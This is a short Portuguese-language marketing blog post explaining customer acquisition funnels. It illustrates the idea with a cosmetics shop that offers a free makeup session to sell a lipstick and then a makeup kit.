Você sabe o que é uma Campanha de Aquisição?

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Também conhecida por Sistema de Aquisição de Clientes ou Funil de Aquisição de Clientes, a Campanha de Aquisição de forma geral nada mais é do que criar uma jornada de compra ideal para o cliente seguir, desde o primeiro momento em que ele tem contato com a sua empresa até o momento da finalização da compra do produto ou contratação do serviço ofertado.

Ao contrário dos chamados “funis de vendas” que vemos por aí, o Funil de Aquisição tem como principal objetivo gerar uma primeira aquisição ao menor custo possível. Ou seja, seu objetivo não está em gerar lucro imediato ou vender de cara o produto principal da empresa, mas sim em atrair o maior número possível de potenciais clientes gerando um primeiro comprometimento ao menor custo possível.

O sistema de aquisição é arquitetado estrategicamente para criar o primeiro comprometimento do futuro cliente antes mesmo de se fazer a oferta do produto principal, ou seja, existe todo um contexto previamente pensado e preparado para orientar o futuro cliente a tomar a ação foco daquele sistema de aquisição.

Vamos pegar como exemplo lojas que vendem produtos de maquiagem feminina, geralmente a cliente intuitivamente pergunta à vendedora se a cor do batom objeto do seu desejo combina com o seu tom de pele e na mesma hora o que a vendedora oferece?

Fazer um make-up inteiramente gratuito que irá ressaltar exclusivamente como aquele tom específico de batom fica especialmente bonito na cliente. Logo a vendedora já começou a preparar a cliente para a venda e a colocou em jornada de compra, como também já despertou a demanda na cliente por outro produto agregado que ela dificilmente não irá comprar, pois já percebeu o valor agregado naqueles utilizados na maquiagem.

Portanto, a cliente foi preparada para a venda apenas com um simples batom e ao mesmo tempo comprometida com o produto-chave principal quando simplesmente se dispôs a fazer a maquiagem naquele momento.

O único trabalho da vendedora foi ter a habilidade e a perspicácia de conduzir a cliente pela jornada de compra até conclusão da venda finalizada com o batom (produto de menor valor) e com o kit de maquiagem (produto de maior valor), conseguiu perceber aqui o sistema de aquisição em pleno funcionamento?

Agora você devem estar se perguntando como isso se aplica no ambiente online? Bem, esse será o assunto do nosso próximo artigo, até lá!

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